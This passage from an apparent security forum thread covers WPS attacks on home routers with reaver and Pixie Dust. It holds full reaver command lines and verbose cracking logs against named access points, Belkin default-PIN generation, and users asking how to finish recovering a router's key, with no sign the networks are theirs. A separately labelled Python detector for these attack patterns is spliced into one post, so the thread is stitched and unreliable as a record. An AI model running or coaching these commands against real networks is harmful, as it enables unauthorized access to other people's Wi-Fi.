    [P] E-Nonce: 1e:80:8f:8d:00:49:27:e8:34:c8:02:f1:be:6c:17:06
    [P] PKE: 21:2c:e8:59:ca:7a:60:38:b2:4e:29:6a:a3:7e:58:d2:a5:df:89:03:a8:78:e6:27:39:1e:69:46:62:ba:af:af:d5:a0:1d:11:36:6a:c9:02:d8:23:a5:28:b3:69:f2:39:db:5e:2f:cc:0c:f4:81:29:64:1d:e7:f4:7f:62:c8:79:4a:dd:3b:ed:5d:e0:fd:08:66:2b:e3:02:24:3a:2d:35:48:4e:3e:d7:af:d2:8f:18:ba:50:eb:24:e0:5a:03:82:90:69:c1:a1:af:a3:bf:1c:5d:1b:54:48:5e:5b:61:06:1a:1f:54:b5:67:da:6a:e0:04:44:6a:f2:c0:2f:58:6d:4c:f7:a7:b3:ce:a3:dd:d4:ca:4a:fd:e5:ad:a7:c6:c3:e9:8f:f2:9b:97:f1:f5:9e:a4:07:8c:12:fe:ea:35:47:ee:cc:4e:8f:f0:64:6c:a7:7a:c7:6a:84:0f:ea:e8:77:76:e3:89:21:ba:4f:08:56:33:62:78:cf:1d:6c:57:7d
    [P] WPS Manufacturer: D-Link
    [P] WPS Model Number: DIR-615
    [P] WPS Model Serial Number: none
    [+] Received M1 message
    [P] PKR: ab:c9:36:63:de:53:66:02:df:77:ae:85:a1:aa:90:61:f3:a0:7e:fd:0b:ba:68:e0:13:5b:70:10:66:46:6b:eb:26:d3:33:43:fa:0d:82:f2:b4:88:f6:8c:02:fb:0b:07:76:5c:06:8c:eb:36:b8:fd:7f:7e:ce:19:18:77:dd:24:e4:30:62:42:6f:a9:27:3c:dc:8d:1f:36:5c:c1:43:e3:23:c7:ba:c4:48:a9:c4:d8:a7:0a:64:2a:2c:0b:0d:8f:d7:5c:7f:d9:22:f5:8c:3b:50:42:17:fe:56:71:4a:ff:75:d2:18:df:44:0d:6f:ce:87:3c:38:77:f8:f1:09:39:8f:cc:ba:75:67:11:20:a2:bd:99:25:fe:62:ac:5b:9d:97:71:2f:96:7f:0e:da:44:3f:bd:62:9c:e4:53:d7:81:21:64:79:a0:46:6d:36:18:ec:77:57:43:6d:c4:d2:d3:43:e0:38:f6:4e:ae:5c:cc:ae:4c:d6:31:a5:68:cc:84
    [P] AuthKey: dc:c0:e9:e9:e2:13:b4:81:d5:92:e6:b7:b8:7e:0e:e0:29:49:6e:eb:9a:95:7f:9e:05:92:48:3e:38:2a:86:3a
    [+] Sending M2 message
    [P] E-Hash1: 2c:08:61:26:58:76:5d:f6:ee:59:d9:7a:32:43:b8:f9:1f:05:3c:a4:cc:f6:22:3a:24:c8:9c:e2:ef:df:3a:52
    [P] E-Hash2: 0e:3a:b4:d2:93:21:91:5e:66:3b:f4:e6:13:db:40:87:b9:fd:80:0b:2b:fa:87:37:fb:5d:41:67:21:38:aa:61
    [+] Received M3 message
    [+] Sending M4 message
    [+] Received WSC NACK
    [+] Sending WSC NACK
    [+] p2_index set to 1
    [+] Pin count advanced: 10001. Max pin attempts: 11000
    [+] Trying pin 69130571.
    [+] Sending EAPOL START request
    [+] Received identity request
    [+] Sending identity response
    [+] Received identity request
    [+] Sending identity response
    ^C
    [+] Session saved.
    root@root:~# reaver -i mon0 -b 14:D6:4D:2D:C7:64 -c 3 -vv -W1 -S
    
    Reaver v1.5.2 WiFi Protected Setup Attack Tool
    Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
    mod by t6_x <t6_x@hotmail.com> & DataHead
    
    [+] Switching mon0 to channel 3
    [?] Restore previous session for 14:D6:4D:2D:C7:64? [n/Y] n
    [+] Waiting for beacon from 14:D6:4D:2D:C7:64
    [+] Associated with 14:D6:4D:2D:C7:64 (ESSID: 67248Lengen)
    [+] Starting Cracking Session. Pin count: 0, Max pin attempts: 11000
    [+] Trying pin 12345670.
    [+] Sending EAPOL START request
    [+] Received identity request
    [+] Sending identity response
    [P] E-Nonce: 88:f6:3a:26:77:59:5d:b7:f9:07:f7:16:4b:6a:1c:af
    [P] PKE: 9b:17:58:e6:f5:d8:bf:6e:b2:c7:4c:b3:b4:33:06:66:c2:1c:fa:0b:ae:a2:77:c2:25:64:1f:3f:cc:61:98:07:1f:bf:90:7c:bc:2f:c3:c0:f9:6b:07:77:bb:5c:58:18:e5:80:22:41:2c:28:77:d5:21:30:9f:37:70:94:aa:36:b4:dd:82:50:0d:28:b0:12:c3:cd:42:a8:d1:76:9b:90:4d:e9:a7:4e:52:4e:27:c4:92:39:af:31:4a:99:9e:33:ca:76:c6:a1:05:67:8f:87:ca:fc:6f:92:d7:47:99:4f:86:0d:a7:3c:7c:b2:b7:cc:6a:fc:a1:d8:81:0e:a8:c3:79:99:a7:c7:cb:01:94:dc:5c:ac:15:3f:25:22:85:47:6b:81:30:bf:aa:f5:d2:ab:ac:5a:b0:72:13:0b:85:97:02:15:70:11:0e:ce:49:16:43:a9:d3:23:89:6b:5e:cf:99:63:9a:bb:b4:e0:1f:3b:83:6e:f7:ff:72:e4:36:d5
    [P] WPS Manufacturer: D-Link
    [P] WPS Model Number: DIR-615
    [P] WPS Model Serial Number: none
    [Pin Gen] Belkin Default Pin Generator by devttys0 team
    [Pin Gen] Pin Generated : 95278582
    
    root@root:~# reaver -i mon0 -b 14:D6:4D:2D:C7:64 -c 3 -vv -p 95278582
    
    Reaver v1.5.2 WiFi Protected Setup Attack Tool
    Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
    mod by t6_x <t6_x@hotmail.com> & DataHead
    
    [+] Switching mon0 to channel 3
    [+] Waiting for beacon from 14:D6:4D:2D:C7:64
    [+] Associated with 14:D6:4D:2D:C7:64 (ESSID: 67248Lengen)
    [+] Starting Cracking Session. Pin count: 10000, Max pin attempts: 11000
    [+] Trying pin 95278582.
    [+] Sending EAPOL START request
    [+] Received identity request
    [+] Sending identity response
    [P] E-Nonce: ff:94:71:b4:2c:c9:c9:f7:58:84:92:e0:5c:f4:76:ee
    [P] PKE: 57:c6:10:df:65:ef:bc:3b:d4:f0:04:9c:ad:01:05:58:ff:67:c5:31:67:16:f5:bf:6d:0e:13:2e:b2:87:f9:a3:12:1d:bb:3b:79:be:6a:34:eb:e2:2d:3f:92:65:56:57:87:9a:b6:7b:0f:59:ba:d0:b3:28:1f:97:56:50:03:f0:1e:a8:68:f9:6f:23:f7:81:98:10:de:9a:88:c6:39:36:78:62:ae:86:29:c0:d7:a3:b4:93:2c:34:b5:d1:a0:7f:a0:de:16:59:67:d8:82:93:e9:79:77:23:3a:19:b8:7f:e6:c8:c6:15:33:c7:2a:c2:82:c6:2a:64:e9:98:3e:26:47:1a:b5:96:68:ee:bd:80:4c:ba:8e:ff:2f:94:e9:b2:fd:6a:89:e1:a8:59:f1:c6:8c:00:cb:1e:ac:ca:87:e1:f8:88:9a:fb:36:26:31:90:86:ee:2c:81:40:71:d0:e8:2d:f0:37:25:73:ff:e6:56:ee:7f:1c:d2:03:8a:3b:97
    [P] WPS Manufacturer: D-Link
    [P] WPS Model Number: DIR-615
    [P] WPS Model Serial Number: none
    [+] Received M1 message
    [P] PKR: 73:ff:53:78:47:21:ee:d6:b8:90:4f:4f:bf:14:d6:7a:80:f8:b0:60:d7:45:9e:ca:96:a4:ca:d1:e5:09:5e:d1:14:68:2d:78:45:e1:f8:28:39:54:13:2a:8f:c5:e0:8d:9e:02:cb:78:85:7d:e3:71:c4:34:91:ef:19:dc:e6:47:10:1e:b7:ec:08:a7:2a:6a:f2:b1:52:ab:43:f0:ce:0e:cb:68:30:d7:14:12:5d:6f:d0:0a:16:ad:65:ff:1f:6f:80:22:d8:70:87:1f:2f:65:de:af:63:b1:92:1d:20:e2:a1:6a:db:4b:59:4d:fc:ea:e0:e0:d7:53:4f:b2:57:7e:58:e5:d1:f5:38:4c:a4:35:b0:77:dc:72:1f:c1:49:a6:62:aa:83:4c:52:69:77:64:5a:52:7d:55:d4:79:6d:5b:fd:31:29:66:bc:0a:27:00:f0:1d:78:13:af:c8:62:10:18:84:30:59:65:d4:56:f2:14:9c:25:21:ed:7f:7d:93
    [P] AuthKey: eb:19:49:07:2c:05:08:68:49:1f:e1:03:71:fa:31:02:0e:e8:d2:6c:38:93:77:87:58:b1:5c:79:16:3f:f0:a3
    [+] Sending M2 message
    [P] E-Hash1: d8:46:6a:42:ad:f5:1a:c0:4e:07:f3:19:89:01:7f:13:4d:a2:c5:49:f5:ba:83:2f:22:c1:31:71:5e:5e:31:9e
    [P] E-Hash2: 62:b2:a7:fb:86:45:ed:89:f8:13:55:59:e4:91:70:0f:3a:26:5a:81:fd:71:60:13:fd:c2:c5:61:e4:85:1c:ba
    [+] Received M3 message
    [+] Sending M4 message
    [+] Received WSC NACK
    [+] Sending WSC NACK
    [+] p2_index set to 1
    [+] Pin count advanced: 10001. Max pin attempts: 11000
    [+] Trying pin 95278582.
    [+] Sending EAPOL START request
    [+] Received identity request
    [+] Sending identity response
    [P] E-Nonce: c0:d3:bf:2d:93:56:f7:70:dc:a8:59:f5:36:d0:72:93
    [P] PKE: c5:86:72:3c:5a:5e:03:03:c1:13:4c:64:3e:3e:89:57:7b:76:f7:2b:1c:ff:2a:91:89:33:d6:d9:b3:bb:f4:d1:06:52:d9:01:87:cf:52:f5:6c:14:65:52:fd:8d:00:68:47:b9:d4:ca:14:db:8a:8a:3b:e6:d0:f1:eb:43:29:0f:28:5e:90:48:95:fa:53:ef:bb:9c:9e:f0:61:1d:71:83:85:cb:a8:32:ea:8b:50:a2:21:00:a2:5d:73:b7:bd:6c:d5:94:89:12:3d:e6:ca:5e:ff:8c:d5:4c:f4:d7:8b:9a:55:8e:5d:79:47:a4:38:11:66:68:29:4b:16:84:9c:a0:47:19:c5:50:a8:36:97:73:d2:63:a9:f3:16:bb:2a:4a:6e:8f:d7:09:e1:ac:5c:1f:68:19:17:b8:70:77:94:e0:d1:53:f7:8f:7d:f1:ad:14:c0:7e:da:9f:26:fe:19:ab:6c:52:dc:8e:88:fd:94:0b:cb:33:ce:d1:61:42:8c:bb
    [P] WPS Manufacturer: D-Link
    [P] WPS Model Number: DIR-615
    [P] WPS Model Serial Number: none
    [+] Received M1 message
    [P] PKR: b9:8a:d9:34:3e:d8:cd:45:b1:1d:f6:17:d1:16:fd:68:76:3d:59:44:de:eb:14:ca:dd:db:34:7f:1f:70:6a:45:0b:c1:0f:d7:c6:5e:5f:e0:be:30:ce:cc:66:9e:99:20:6c:86:2e:5a:de:5f:40:47:ef:68:fc:cd:3a:59:40:fa:09:5a:6d:c7:af:31:2a:96:b9:7a:08:d2:fc:75:dc:4b:0b:da:ca:61:de:c6:4e:d4:c7:49:58:89:83:97:d9:ef:21:c9:70:07:26:96:3a:6b:6b:71:34:fe:62:c0:61:ef:7e:66:bc:1c:44:10:0f:54:59:ba:5a:77:46:75:ce:87:7e:71:12:94:b5:51:2f:6b:b7:19:7b:cf:e5:45:78:5f:8b:1f:e1:1e:3f:09:1a:cc:99:4e:11:a7:fc:96:23:2d:8a:57:31:25:27:b6:67:43:56:63:c2:d6:7d:96:50:9d:e8:72:2a:36:7a:a5:8d:03:c4:0e:92:5a:56:6e:34:22
    [P] AuthKey: 34:92:98:34:a9:c5:f8:45:40:64:7e:e1:c5:de:27:af:88:35:80:6b:1e:49:d4:6e:d3:94:d3:99:0e:69:07:2c
    [+] Sending M2 message
    ^C

  35. #35
    Join Date
    2013-Oct
    Posts
    321
    @ t6_x

    Nice work matey, many thanks.

    I've got a question: what does "-P, --pixiedust-loop" do, and when should it be used?

  36. #36
    Join Date
    2015-Apr
    Posts
    28
    I took screenshots in Wireshark of the M1-M2-M3-M4 messages and of the trying screen.

    Why does Pixiewps not work for the TP-LINK RTL 8671 EV 2006 27 07 (Realtek)?

    Where is the pin?
    Last edited by Saydamination; 2015-05-16 at 21:05.

  37. #37
    Join Date
    2013-Jul
    Location
    United States
    Posts
    519
    Quote Originally Posted by slim76 View Post
    @ t6_x

    Nice work matey, many thanks.

    I've got a question: what does "-P, --pixiedust-loop" do, and when should it be used?
    It stops the WPS exchange after the M3 message is received. This way (hopefully) we will avoid any lockouts... the router will report a failed WPS exchange and won't count it. You should only use it when attacking via Pixie Dust. If you are doing a regular old 11,000 pin brute force, don't use it.
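    The answer above describes the exchange -P produces on the air: the station (acting as external registrar) sends EAPOL START, the AP answers with M1, the station sends M2, the AP sends M3 and the station then stops, whereas a PIN brute force goes on to M4 and gets a WSC NACK back (the verbose reaver logs earlier in the thread show exactly that sequence). From the access point's or a wireless IDS's side, those two shapes are what to look for. The following is an added Python example, not code from reaver, pixiewps or any poster, that cuts a per-station WPS message log into sessions and flags stations that repeatedly abandon after M3 or repeatedly collect NACKs; the event tuple format, the message names and the sample events are constructed assumptions.

```python
"""Classify WPS registration sessions from a per-station EAP-WSC message log
and flag the two shapes discussed in the thread: sessions abandoned right
after M3 (what --pixiedust-loop does, since the offline attack only needs
M1..M3) and sessions that keep ending in a WSC NACK after M4 or M6 (online
PIN brute force).

Added example for a WIDS or log pipeline; not code from reaver or pixiewps.
Events are (time_sec, station_mac, message) tuples. Message names and the
sample below are constructed; real input would be derived from a
monitor-mode capture of EAPOL/EAP-WSC frames. Sides: the station acts as
external registrar, so the AP sends M1/M3/M5/M7 and the station M2/M4/M6/M8.
"""
from collections import defaultdict
from typing import Dict, Iterable, List, Tuple

Event = Tuple[int, str, str]


def split_sessions(events: Iterable[Event]) -> Dict[str, List[List[str]]]:
    """Group events per station and cut them into sessions at each EAPOL-Start
    (reaver sends one EAPOL START per PIN attempt, as its verbose log shows)."""
    per_station: Dict[str, List[Tuple[int, str]]] = defaultdict(list)
    for t, station, msg in sorted(events):
        per_station[station].append((t, msg))
    sessions: Dict[str, List[List[str]]] = {}
    for station, evs in per_station.items():
        sessions[station] = []
        current: List[str] = []
        for _, msg in evs:
            if msg == "EAPOL-Start":
                current = []
                sessions[station].append(current)
                continue
            if not sessions[station]:  # traffic seen without a leading EAPOL-Start
                sessions[station].append(current)
            current.append(msg)
    return sessions


def classify_session(msgs: List[str]) -> str:
    """Label one session by how far the exchange got and how it ended."""
    if "M8" in msgs or "WSC-Done" in msgs:
        return "completed"
    if "WSC-NACK" in msgs:
        if "M6" in msgs:
            return "nack_after_m6"  # first PIN half accepted, second half rejected
        if "M4" in msgs:
            return "nack_after_m4"  # first PIN half rejected
        return "nack_early"
    if msgs and msgs[-1] == "M3":
        return "abandoned_after_m3"  # station got the AP's M3 and never sent M4
    return "incomplete"


def assess_stations(events: Iterable[Event], threshold: int = 3) -> Dict[str, dict]:
    """Per station: session count, per-label counts and the flags raised."""
    report: Dict[str, dict] = {}
    for station, sess in split_sessions(events).items():
        counts: Dict[str, int] = {}
        for msgs in sess:
            label = classify_session(msgs)
            counts[label] = counts.get(label, 0) + 1
        flags = []
        if counts.get("abandoned_after_m3", 0) >= threshold:
            flags.append("pixie_dust_pattern")
        if counts.get("nack_after_m4", 0) + counts.get("nack_after_m6", 0) >= threshold:
            flags.append("pin_bruteforce_pattern")
        report[station] = {"sessions": len(sess), "counts": counts, "flags": flags}
    return report


def _attempt(station: str, t0: int, msgs: List[str]) -> List[Event]:
    """Build one session's events starting at t0 (helper for the sample only)."""
    return [(t0 + i, station, m) for i, m in enumerate(["EAPOL-Start"] + msgs)]


# Constructed sample: A abandons after M3 three times, B is NACKed after M4
# three times, C completes one legitimate registration.
SAMPLE_EVENTS: List[Event] = (
    _attempt("A", 0, ["M1", "M2", "M3"])
    + _attempt("A", 10, ["M1", "M2", "M3"])
    + _attempt("A", 20, ["M1", "M2", "M3"])
    + _attempt("B", 0, ["M1", "M2", "M3", "M4", "WSC-NACK"])
    + _attempt("B", 10, ["M1", "M2", "M3", "M4", "WSC-NACK"])
    + _attempt("B", 20, ["M1", "M2", "M3", "M4", "WSC-NACK"])
    + _attempt("C", 0, ["M1", "M2", "M3", "M4", "M5", "M6", "M7", "M8", "WSC-Done"])
)

if __name__ == "__main__":
    for station, info in assess_stations(SAMPLE_EVENTS).items():
        print(station, info)
```

    The point of separating the two labels is that an AP's own lockout counter, as the answer notes, may only count sessions that reach a NACK; a station that keeps walking away after M3 never trips it, so a monitor that counts abandoned-after-M3 sessions per station is the detection an AP-side lockout does not give you.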

  38. #38
    Join Date
    2013-Mar
    Posts
    3
    @t6_x

    Just confirming: does the latest version on git (1.5.2) require the -K 1 option to test all 3 chipsets now?

    Cheers
    Exta

  39. #39
    Join Date
    2015-Apr
    Posts
    39
    Quote Originally Posted by Saydamination View Post
    http://i.imgur.com/aZv2TNu.png
    http://i.imgur.com/0zBtqpb.png
    http://i.imgur.com/f8AUILE.png
    http://i.imgur.com/n7Fs4s3.png
    http://i.imgur.com/sC80azr.png
    http://i.imgur.com/otwUL64.png
    http://i.imgur.com/RpB5I6T.png
    http://i.imgur.com/awpjzcU.png

    I took screenshots in Wireshark of the M1-M2-M3-M4 messages and of the trying screen.

    Why does Pixiewps not work for the TP-LINK RTL 8671 EV 2006 27 07 (Realtek)?

    Where is the pin?

    Because the flaw that pixiedust takes advantage of is a firmware flaw and not a chipset flaw.

    But as it is difficult to make a list of all firmwares which exist, a chipset list is made where there is a higher probability
    that the attack will work.

  40. #40
    Join Date
    2015-Mar
    Posts
    127
    Just the Belkin pin Attack

    Target:
    Code:
    airodump-ng
    CH  6 ][ Elapsed: 4 mins ][ 2015-04-19 09:48

     BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH WPS           ESSID     MANUFACTURER

    ..............:52:A1  -66  24     1160      336    0   6  54e. WPA2 CCMP   PSK  1.0 LAB,DISP  999 Kane  Belkin International Inc.
    ..............:37:56  -83   0        5        0    0   6  54e  WPA2 CCMP   PSK  1.0 LAB,DISP  999 Kane  Belkin International Inc.

     BSSID              STATION            PWR   Rate    Lost    Frames  Probe

    ..............:52:A1  ..............:37:56  -86   54e- 1e     0       98  999 Kane
    Reaver Attack
    Code:
    root@kali:~# reaver -i wlan3mon -b ..............:52:A1 --mac=..............:37:56 -N -S -K1 -W1
    
    Reaver v1.5.2 WiFi Protected Setup Attack Tool
    Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
    mod by t6_x <t6_x@hotmail.com> & DataHead & Soxrok2212
    
    [+] Waiting for beacon from ..............:52:A1
    [+] Associated with ..............:52:A1 (ESSID: 133 Kane)
    [+] Starting Cracking Session. Pin count: 0, Max pin attempts: 11000
    [P] E-Nonce: 9c:60:b1:26:35:6b:54:36:94:b4:db:e3:8a:f8:98:99
    [P] PKE: ee:4a:2f:c4:45:67:2e:c2:e8:89:0c:c0:ad:08:31:0c:98:db:ce:d5:8c:53:23:8c:a3:e7:af:c1:f8:81:1f:69:88:8c:28:b9:bc:02:3f:32:4a:f6:f0:59:21:59:35:d8:0c:8f:44:ce:0d:34:f5:21:3f:8e:8e:d4:a1:03:62:4c:d2:e9:ea:fe:4d:15:72:a7:84:63:d6:0d:fb:c5:19:79:b8:57:96:b6:7f:e1:f8:a8:fe:28:88:76:04:ae:46:54:92:0a:0c:38:c4:b9:c3:dc:36:45:3a:65:18:93:ee:f4:f0:cc:6c:10:8b:8e:bc:c2:c9:1f:10:9c:61:ff:ce:d4:31:32:8c:30:31:f0:48:5d:2b:94:ec:c0:91:4e:2d:59:3f:e1:8c:13:c2:59:63:73:dc:a3:0e:67:fc:a2:b3:06:e7:b5:c0:17:36:73:77:14:d2:8f:d6:a2:d4:be:bb:4b:8f:3d:e6:2b:c0:81:50:0f:da:d5:09:b4:12:18:d2:e8
    [P] WPS Manufacturer: Linksys, LLC
    [P] WPS Model Number: WRT1900AC
    [P] WPS Model Serial Number: 13J10607432814
    [Pin Gen] Belkin Default Pin Generator by devttys0 team
    [Pin Gen] Pin Generated : 92454590
    [Pin Gen] Pin Generated (+1): 02932804
    [Pin Gen] Pin Generated (-1): 81966103
    Next Step? Try all three pins?
    reaver -i wlan3mon -b ..............:52:A1 --mac=..............:37:56 -N --pin=92454590
    Because reaver started looping, is this correct? I had to Ctrl+C.

    Code:
    root@kali:~# reaver -i wlan3mon -b ..............:52:A1 --mac=..............:37:56 -N --pin=92454590
    
    Reaver v1.5.2 WiFi Protected Setup Attack Tool
    Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>
    mod by t6_x <t6_x@hotmail.com> & DataHead & Soxrok2212
    
    [+] Waiting for beacon from ..............:52:A1
    [+] Associated with ..............52:A1 (ESSID: 133 Kane)
    [+] Starting Cracking Session. Pin count: 10000, Max pin attempts: 11000
    [P] E-Nonce: 2c:7b:dd:2f:82:20:e5:a0:f6:92:35:7a:f6:c9:2a:e7
    [P] PKE: 4a:6d:39:a0:aa:62:4c:05:69:35:0d:c8:7b:4a:5d:bf:8d:93:c6:49:93:c2:df:b5:ec:d6:73:cc:d6:4b:48:06:f2:2c:52:37:c2:a7:95:1a:28:e6:65:b0:5d:f0:f5:7e:12:e0:98:48:db:9a:4a:76:5d:45:3b:33:8e:d9:e6:d4:f4:76:42:7b:03:73:29:d3:f1:3b:56:0d:e7:95:76:9d:f8:94:bb:5a:67:59:45:73:70:d5:48:5b:5a:a2:89:d1:8f:69:43:00:1c:bc:ce:ae:48:7b:08:9e:64:c2:d7:21:b3:ed:73:99:43:dd:44:8a:a5:9a:24:fd:8c:02:7c:17:5c:f2:4a:5f:5b:9c:c3:8d:99:c1:49:5b:2e:5f:09:63:85:ff:8a:72:77:c6:0a:56:14:f7:29:28:9f:82:24:47:aa:1b:eb:28:16:0d:f0:e2:a9:d0:f9:01:e4:61:a0:b8:24:44:71:34:d0:e5:f5:3f:71:b8:88:12:04:01:36:15
    [P] WPS Manufacturer: Linksys, LLC
    [P] WPS Model Number: WRT1900AC
    [P] WPS Model Serial Number: 13J10607432814
    [P] PKR: e3:07:eb:ea:e5:8d:25:e4:a8:65:08:ab:52:99:3b:2c:8a:a4:c5:82:c9:46:96:62:1c:76:63:96:06:ba:e9:14:1d:d1:c0:1f:42:27:38:99:6d:14:c6:79:00:bf:9d:f5:77:98:73:9d:fd:83:52:f3:f1:cb:73:0e:e1:6d:d2:17:be:9b:ba:fc:16:f9:2d:22:e3:ab:c0:3a:90:b9:0c:3d:b0:0b:ad:90:89:b5:12:c9:41:3f:36:17:39:16:3b:a5:80:e4:a1:17:39:9b:1f:24:3f:f1:20:21:6a:f0:48:a9:05:73:3c:b6:06:c8:fe:34:a9:79:70:eb:ff:a8:7c:49:07:19:5f:c8:2e:76:a3:c7:8a:5d:10:28:72:f1:41:b2:38:d7:53:87:99:d4:bd:e0:9c:d7:01:01:cc:f9:b0:14:9e:6e:52:44:fe:34:66:b0:64:a1:69:73:4f:09:0e:93:89:0b:c9:cb:b6:51:d5:5f:ba:9e:7d:44:be:91:f0:d5
    [P] AuthKey: 19:f0:66:81:34:9e:6f:eb:41:7f:93:38:f7:42:ba:ce:6d:88:06:0c:76:43:d4:cc:9b:0f:c8:44:9d:43:21:e5
    [P] E-Hash1: 16:a4:f5:79:a7:5b:29:1d:1a:8f:d7:4e:dd:fd:5a:a6:8e:94:3c:34:f0:77:ae:e0:03:38:31:8f:85:25:fb:9c
    [P] E-Hash2: 10:90:3b:33:ed:74:7c:5e:9d:51:b7:2d:8f:4b:55:5f:d6:64:a2:91:7a:f7:66:7b:86:61:29:d1:a4:c0:bb:c4
    [P] E-Nonce: 72:08:37:e8:34:12:e7:50:25:d4:c1:80:f9:68:a0:0b
    [P] PKE: 19:a9:2d:d4:31:cb:f4:be:b8:38:bd:18:91:0a:de:f5:1b:1c:cf:6e:d3:c2:34:00:1e:88:db:6f:bd:a1:bb:d9:51:bc:d8:d2:60:24:c6:01:97:27:ee:ad:01:96:49:47:c4:e9:44:e6:c7:84:3b:25:d5:b7:ab:bf:18:f3:39:0e:ee:74:6d:b6:f0:a4:dc:55:c1:cf:ad:4c:2d:a2:af:fb:21:a1:77:5d:59:13:bc:0a:fd:6a:cc:91:97:96:78:7e:c0:88:65:7f:0d:b1:b9:dd:85:7a:45:2c:2f:78:d9:af:2a:0e:37:12:66:8f:c3:e8:fc:0c:b5:eb:32:5a:cd:36:88:91:ba:ad:3c:5f:72:e9:b1:53:91:51:1c:24:39:f1:6a:73:e7:bb:b7:40:f0:35:61:7d:84:37:b3:21:32:3d:55:9d:a4:e7:94:9b:2a:53:45:40:d7:5b:8c:5b:20:95:ad:1e:df:01:f7:33:7a:98:ca:7b:5b:91:a7:d7:c9:da
    [P] WPS Manufacturer: Linksys, LLC
    [P] WPS Model Number: WRT1900AC
    [P] WPS Model Serial Number: 13J10607432814
    [P] PKR: 72:be:10:2b:73:ae:55:e7:d0:4e:8a:b7:f4:d5:4c:90:f5:fe:83:9c:91:80:76:d7:93:bb:95:7c:07:67:3e:00:9c:54:f5:31:e5:be:13:cd:ad:77:93:13:5d:f8:fc:68:2d:27:36:3e:2a:99:8e:08:fe:d5:e1:85:f1:f5:2d:e7:a0:13:48:05:56:62:04:42:19:ef:ca:b9:6b:5c:15:02:37:df:51:c5:12:a2:63:0e:ce:fa:c1:46:43:ef:3e:45:70:2c:8c:da:21:ef:c3:6f:ea:81:de:85:b7:b0:df:f7:6a:84:48:f5:63:d6:29:bf:a8:cf:1e:da:1a:ba:7f:d7:ed:58:c9:7b:65:fe:21:3c:e8:24:89:9b:50:bb:b5:b4:92:ea:ec:3b:2c:8e:40:77:77:71:cb:37:b5:a6:76:8f:27:53:61:5b:ef:27:83:ea:b9:af:93:89:93:4b:d4:a6:1f:56:c7:e1:5d:32:7c:68:0e:54:e8:a1:58:ab:1a:41
    [P] AuthKey: c9:9d:b6:14:1f:5e:4d:c0:33:fb:84:01:5d:6f:f4:82:a3:e7:e1:c9:2f:da:52:e0:65:7d:e5:11:45:a3:74:91
    [P] E-Hash1: 0a:2f:d2:43:7f:21:b5:77:ab:84:a3:29:33:b0:6a:29:0e:56:e6:35:61:69:65:0b:70:37:34:6d:05:0e:82:ab
    [P] E-Hash2: 6c:07:cf:fc:5a:9d:50:ed:4d:d3:76:73:cb:5f:58:ee:e3:75:5f:e8:42:6d:f9:09:ee:14:5a:21:e2:98:b4:74
    [P] E-Nonce: 3c:15:76:fe:ec:f9:26:91:a0:33:2e:cb:24:03:4b:a5
    [P] PKE: f3:68:9b:3c:3e:9f:dc:1d:ac:0d:7c:1d:e0:fa:c1:b0:e9:f5:5b:bf:42:18:e7:ee:15:c9:e8:88:fd:5e:01:27:7e:87:17:60:07:4f:1e:82:d7:02:bb:f7:a8:b1:df:9d:5d:58:72:25:57:81:c8:32:5c:1d:97:46:77:81:af:0c:69:d8:46:6e:3b:51:10:e2:22:07:45:c9:36:84:28:22:ec:69:c1:95:a4:79:9d:62:e6:40:9f:b3:61:60:59:0d:c7:55:3c:9c:5c:30:7f:ec:6c:0e:2d:ba:16:b8:03:7b:52:f1:f1:95:9b:b6:d2:d2:88:a4:39:8f:99:89:5b:46:b2:b5:06:6c:2b:46:09:08:b5:72:94:ae:9a:d8:c1:a3:b5:e0:c1:b2:d0:ee:47:eb:f1:44:5b:be:09:e0:48:79:68:e8:21:1c:5a:2a:8e:df:af:e9:cb:6f:77:1a:b3:ec:d5:d0:a4:3a:77:d5:4d:37:1c:98:97:d1:42:ae:62:db
    [P] WPS Manufacturer: Linksys, LLC
    [P] WPS Model Number: WRT1900AC
    [P] WPS Model Serial Number: 13J10607432814
    [P] PKR: 42:ba:10:a6:1e:5a:ce:c9:89:4b:df:91:66:02:98:84:5b:c0:5a:07:93:a1:fe:71:16:49:87:61:63:b8:fd:7e:ff:79:e6:ae:8e:a6:cd:7b:1d:3e:31:40:d1:c7:fc:50:90:48:40:2d:b1:63:ee:c2:fc:d5:55:31:87:ed:98:a8:e0:ff:ac:cc:aa:ec:e2:b7:51:76:10:e0:47:11:9c:68:01:7e:65:74:9b:47:45:27:4e:44:b0:bd:32:09:b9:08:69:08:1a:ea:a0:93:78:da:ba:81:31:ee:6a:42:34:ec:7e:21:fb:f1:4b:f9:c3:03:43:1a:78:6a:3c:5f:0a:c6:42:28:c7:32:df:63:0e:ec:5a:38:22:49:98:54:9a:85:be:e4:67:f0:6a:9d:ed:a4:c2:3c:dc:d5:ed:14:29:da:25:4b:05:f7:fc:dc:76:71:a5:48:ba:42:1a:ab:eb:e2:0f:d4:7a:ef:82:20:16:4c:78:eb:9f:d5:16:4f:00:a2
    [P] AuthKey: d8:65:80:ae:99:23:c9:af:b9:32:63:32:80:3e:57:c4:56:42:59:bc:ee:e4:7d:21:53:dc:97:24:b8:02:ba:95
    [P] E-Hash1: ae:7a:f6:a6:1b:ac:f5:60:89:1e:d9:5c:91:38:31:e4:c9:3c:0f:74:d6:a2:c3:fb:6f:93:c1:09:6b:a7:88:a9
    [P] E-Hash2: 19:54:44:af:8f:a0:da:11:4a:6e:05:34:aa:63:b6:0e:8c:8e:03:12:fa:ab:54:d0:3d:3e:d8:21:14:d6:ac:19
    AP locked WPS
    Code:
    CH  6 ][ Elapsed: 15 mins ][ 2015-04-19 10:31 ][ WPA handshake: ..............:52:A1

     BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH WPS           ESSID     MANUFACTURER

    ..............:52:A1  -66  23     5527     1778    0   6  54e. WPA2 CCMP   PSK  Locked        999 Kane  Belkin International Inc.
    ..............:37:56  -77  77     1776        0    0   6  54e  WPA2 CCMP   PSK  1.0 LAB,DISP  999 Kane  Belkin International Inc.

     BSSID              STATION            PWR   Rate    Lost    Frames  Probe
    Should I try other pins after I try unlocking the router?
    What's the correct reaver command after the pin is found?

  41. #41
    Join Date
    2013-Jul
    Location
    United States
    Posts
    519
